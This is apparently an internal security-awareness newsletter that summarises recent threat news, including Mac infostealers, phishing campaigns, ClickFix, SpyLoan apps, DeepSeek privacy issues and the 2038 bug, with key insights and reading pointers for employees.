This is a monthly newsletter I put together for an internal security awareness program. Feel Free to grab and use for your own program.
Macs Targeted by Infostealers in New Era of Cyberthreats
A new wave of cyberattacks is targeting Mac users with infostealers, malicious programs designed to steal sensitive data like passwords and credit card details. Infostealers have traditionally targeted Windows devices, but in recent years, cybercriminals have turned their attention to Macs. One such threat, Poseidon, is the most active infostealer on Mac today, stealing data from over 160 cryptocurrency wallets, web browsers, and password managers. Cybercriminals use malvertising to deliver these threats, making it crucial for Mac users to be cautious when downloading software and visiting unfamiliar websites.
Key Insights:
Poseidon and other infostealers are now targeting Macs, stealing sensitive data such as passwords and cryptocurrency wallet info.
Malicious advertising (malvertising) is being used to trick users into downloading infostealers instead of desired software.
Macs are becoming a key target for cybercriminals, and users must exercise caution and implement strong security measures.
Further Reading: Malwarebytes
Google Now Allows Digital Fingerprinting of Its Users
In a shift from its earlier stance, Google has started allowing digital fingerprinting of its users, a practice that could raise significant privacy concerns. This method collects various pieces of data—such as operating system, browser type, IP address, and plugins—to create a unique identifier for users, even when cookies are cleared. While this allows advertisers to track users across sites, it also bypasses the limitations of cookie-blocking tools.
Key Insights:
Digital fingerprinting creates a unique ID for users based on their browser and device characteristics.
This technique enables tracking even after cookies are cleared, circumventing privacy protections.
Users can take steps to counteract fingerprinting by using privacy-focused browsers, VPNs, and browser extensions.
Further Reading: Malwarebytes Blog
FTC Reports $12.5 Billion in Fraud Losses in 2024
The Federal Trade Commission (FTC) has revealed a staggering increase in fraud-related losses, with reported damages reaching $12.5 billion in 2024. This surge is driven by a combination of online scams, phishing, and identity theft, with a notable increase in fraud targeting older adults and specific industries. As scammers continue to refine their techniques, organizations must remain vigilant and proactive in educating employees and customers on how to recognize and avoid these threats.
Key Insights:
Fraud losses in 2024 hit $12.5 billion, with a significant increase in online scams and identity theft.
Older adults and certain sectors are being disproportionately targeted.
Organizations must enhance education efforts and improve customer protection measures to mitigate the growing threat.
Further Reading: FTC Press Release
DeepSeek Found to Be Sharing User Data with TikTok Parent Company ByteDance
DeepSeek, an AI app, has been caught secretly sharing user data with ByteDance, the parent company of TikTok. The South Korean Personal Information Protection Commission (PIPC) uncovered that DeepSeek automatically transmitted user data every time the app was accessed, doing so without user consent. This data-sharing practice raises serious concerns about privacy, particularly in light of the ongoing scrutiny surrounding ByteDance’s handling of user data. South Korea has removed DeepSeek from app stores and is considering stronger regulations on foreign companies in the country.
Key Insights:
DeepSeek was found transmitting user data to ByteDance servers without user consent.
This app highlights growing concerns about data privacy in AI technologies.
South Korea has taken action by removing the app and considering stronger regulations on foreign tech companies.
Further Reading: Malwarebytes
Beware of DeepSeek Hype: It's a Breeding Ground for Scammers
As DeepSeek, an AI language model from China, gains popularity, cybercriminals are capitalizing on its rise with various scams targeting unsuspecting users. Fake websites, malicious developer tools, phishing on social media, and fraudulent investment schemes are being used to trick individuals into disclosing sensitive data or making financial losses. Scammers are even leveraging DeepSeek's name to promote fake cryptocurrency tokens and fake pre-IPO shares.
Key Insights:
Scammers are using fake websites and social media accounts to impersonate DeepSeek and steal user data.
Malicious Python packages were uploaded to PyPI, disguised as DeepSeek developer tools, to steal sensitive information.
Individuals and businesses must be cautious when downloading tools, verify sources, and implement strong security practices.
Further Reading: SecurityWeek
Predatory App Downloaded 100,000 Times from Google Play Store Steals Data, Uses It for Blackmail
A malicious financial app, "Finance Simplified," has been downloaded over 100,000 times from the Google Play Store. This app, which belongs to the SpyLoan family, promises attractive loan terms but steals sensitive data such as contacts, call logs, and photos. Once the data is collected, the app uses it for blackmail, especially targeting users who fail to make loan payments. Although the app has been removed from the store, it continues to run on affected devices, collecting sensitive data in the background. Users are advised to change passwords, enable two-factor authentication, and monitor their identity for any misuse.
Key Insights:
The app, masquerading as a loan provider, collects personal data for blackmail purposes.
Although removed from the Google Play Store, the app still runs on affected devices.
Users should take immediate steps to secure their data by changing passwords and enabling two-factor authentication.
Further Reading: Malwarebytes
Microsoft 365 Targeted in New Phishing, Account Takeover Attacks
New phishing campaigns are leveraging Microsoft 365's infrastructure to conduct account takeover (ATO) attacks, exploiting tenant misconfigurations and using OAuth redirection. One campaign involves attackers sending phishing emails using Microsoft’s own infrastructure, making detection difficult. These emails, masquerading as legitimate Microsoft notifications, direct victims to call centers, bypassing security controls. Another attack uses OAuth apps pretending to be Adobe and DocuSign to steal credentials and deploy malware. Security teams must be vigilant in securing OAuth applications and scrutinizing internal communications.
Key Insights:
Phishing attacks are exploiting Microsoft 365’s infrastructure for ATO attacks.
Attackers use fake support contacts and legitimate-looking emails to trick victims.
OAuth applications masquerading as trusted brands are used for stealing credentials and deploying malware.
Further Reading: SecurityWeek
The Epochalypse Project: Addressing the 2038 Bug
The Epochalypse Project is raising awareness about the 2038 bug, a critical vulnerability in 32-bit timestamp systems that will impact billions of devices worldwide starting January 19, 2038. The bug could cause major disruptions across industries, from healthcare to energy management, due to systems misinterpreting dates and malfunctioning. As the 2038 deadline approaches, the project aims to bring attention to this issue and develop solutions before it becomes a widespread problem.
Key Insights:
The bug affects embedded devices and systems like medical equipment, IoT devices, and transportation infrastructure.
If unaddressed, it could cause critical system failures, including banking and security disruptions.
The project encourages global collaboration to identify and fix vulnerable systems before 2038.
Further Reading: Epochalypse Project
Is Firebase Phishing a Threat to Your Organization?
Firebase, a platform commonly used for app development, has been exploited in phishing attacks targeting organizations. Attackers can hijack Firebase’s authentication services to launch phishing campaigns, tricking users into divulging sensitive information. These attacks can be used to steal credentials, and in some cases, manipulate cloud-based services that organizations rely on. With Firebase being a trusted service, users may not immediately recognize these phishing attempts, making it a potent tool for attackers.
Key Insights:
Firebase is being exploited for phishing attacks, often targeting organizations’ authentication systems.
Users may unknowingly fall victim due to Firebase’s trusted reputation.
Organizations need to be aware of how Firebase can be misused and take proactive measures to secure their systems.
Further Reading: Check Point Blog
Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon
Unit 42 researchers have observed a surge in phishing attacks leveraging QR codes, a tactic known as "quishing." Attackers embed malicious URLs within QR codes in documents that mimic legitimate services like DocuSign or Adobe Acrobat Sign. When scanned, these QR codes direct users to phishing sites designed to harvest credentials. Notably, some campaigns employ legitimate website redirection mechanisms and Cloudflare Turnstile for user verification, enhancing their credibility and evading security detection. These attacks have been widespread across the U.S. and Europe, impacting industries such as medical, automotive, education, energy, and finance. Unit 42
Key Insights:
Quishing Tactics: Embedding phishing URLs in QR codes increases the likelihood of users accessing malicious sites, especially when personal devices with potentially weaker security are used.
Advanced Evasion Techniques: Utilizing legitimate redirection mechanisms and services like Cloudflare Turnstile allows attackers to bypass traditional security measures. Unit 42
Targeted Industries: A broad range of sectors, including medical, automotive, education, energy, and finance, have been affected, indicating the widespread applicability of this tactic. Unit 42
Further Reading: Unit 42 Blog
Tax-Themed Phishing Campaigns Surge Ahead of U.S. Tax Day
As the April 15 tax deadline nears, Microsoft Threat Intelligence has observed a rise in phishing campaigns exploiting tax-related themes to steal credentials and deploy malware. These attacks use social engineering to impersonate IRS notices or tax document requests and incorporate tactics like QR codes, URL shorteners, and cloud-based file sharing to evade detection. Legitimate services, including Microsoft infrastructure, are being abused to enhance credibility and avoid filters.
Key Insights:
Attackers are using tax season as a lure for phishing, often impersonating tax authorities or financial institutions.
Tactics include QR codes, shortened URLs, and links to legitimate cloud storage to bypass security tools.
Abuse of trusted platforms increases the likelihood of successful compromise.
Further Reading: Microsoft Security Blog
ClickFix: A Deceptive Malware Deployment Technique
Cybercriminals are employing a tactic known as "ClickFix," which masquerades as a CAPTCHA verification to trick users into executing commands that download malware. This scheme prompts users to press a series of keyboard shortcuts—Windows + R, Ctrl + V, and Enter—that open the Run dialog, paste malicious code, and execute it via mshta.exe, a legitimate Windows utility. This method has been used to deliver various malware families, including XWorm, Lumma Stealer, and AsyncRAT.
Key Insights:
ClickFix attacks exploit user actions to bypass security measures, leading to the installation of credential-stealing malware.
Industries such as hospitality and healthcare have been targeted, with attackers impersonating trusted entities like Booking.com.
The attack leverages legitimate Windows functionalities (mshta.exe) to execute malicious code, complicating detection efforts.
Further Reading: Krebs on Security
Pharmacist Allegedly Used Keyloggers to Spy on Coworkers at Maryland Hospital
A former pharmacist at the University of Maryland Medical Center is accused of secretly installing keylogging software on nearly 400 hospital computers over a decade. The class-action lawsuit claims he accessed coworkers’ login credentials, personal files, and even activated webcams in patient exam rooms. The hospital is also being sued for allegedly failing to detect or respond to the breach in a timely manner.
Key Insights:
Keyloggers were reportedly used to steal credentials and access private communications.
The software was allegedly installed across hundreds of hospital systems without detection.
The incident underscores the importance of monitoring for insider threats and unauthorized software.
Further Reading: The Record
